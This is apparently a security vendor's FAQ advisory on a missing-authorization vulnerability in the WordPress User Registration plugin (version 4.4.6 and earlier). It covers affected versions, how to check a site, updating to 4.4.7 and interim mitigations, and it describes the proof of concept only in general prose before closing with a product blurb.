Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the User Registration plugin version 4.4.6 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard under the Plugins section to determine if they are vulnerable.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the User Registration plugin and verify that the version is 4.4.6 or earlier. If it is, your site is at risk.
How can I fix this vulnerability?
Recommended actions
To mitigate this vulnerability, update the User Registration plugin to version 4.4.7 or later, where the issue has been patched. Regularly check for updates to all plugins to ensure ongoing security.
What does the CVSS score of 5.3 mean?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough that administrators should address it promptly to prevent potential exploitation.
What are the practical risks of this vulnerability?
Potential impacts on your site
The practical risks include unauthorized changes to plugin settings, such as the reset password page, which could disrupt user functionality. While the immediate impact may seem limited, it could lead to further exploitation if combined with other vulnerabilities.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a crafted POST request to the AJAX endpoint. It shows how to specify the required parameters to bypass authentication and modify settings, illustrating the ease of exploitation.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the User Registration plugin until a patch can be applied. Additionally, review user permissions and limit access to the WordPress admin area to trusted users only.
Are there any other vulnerabilities associated with this plugin?
Exploring related risks
While CVE-2025-67956 is a specific vulnerability, it highlights a broader pattern of missing authorization checks. It is advisable to conduct a security audit of your plugins and ensure that all are regularly updated and reviewed for security best practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations